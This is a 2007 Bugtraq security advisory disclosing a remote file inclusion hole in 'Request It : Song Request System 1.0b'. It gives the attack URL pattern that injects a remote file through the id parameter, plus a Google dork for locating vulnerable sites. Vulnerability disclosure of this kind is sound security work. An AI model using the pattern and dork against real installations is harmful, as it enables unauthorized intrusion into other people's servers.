
Date: 9 Apr 2007 11:53:35 -0000
From: mail@...kberry.ath.cx
To: bugtraq@...urityfocus.com
Subject: Request It : Song Request System 1.0b - remote file inclusion

Request It : Song Request System 1.0b - remote file inclusion

Software: Request It : Song Request System
Type: remote file inclusion
Version: 1.0b
Date: 2007-04-09
Url: http://scripts.ringsworld.com/organizers/requestit/
Risc: middle


------------------------------------
Credit:

http://hackberry.ath.cx
mail[AT]hackberry.ath.cx


------------------------------------
Vulnerability:

http://[target]/?id=[REMOTEFILE]


------------------------------------
Google dork:

"[ Request us to play you a song ]"
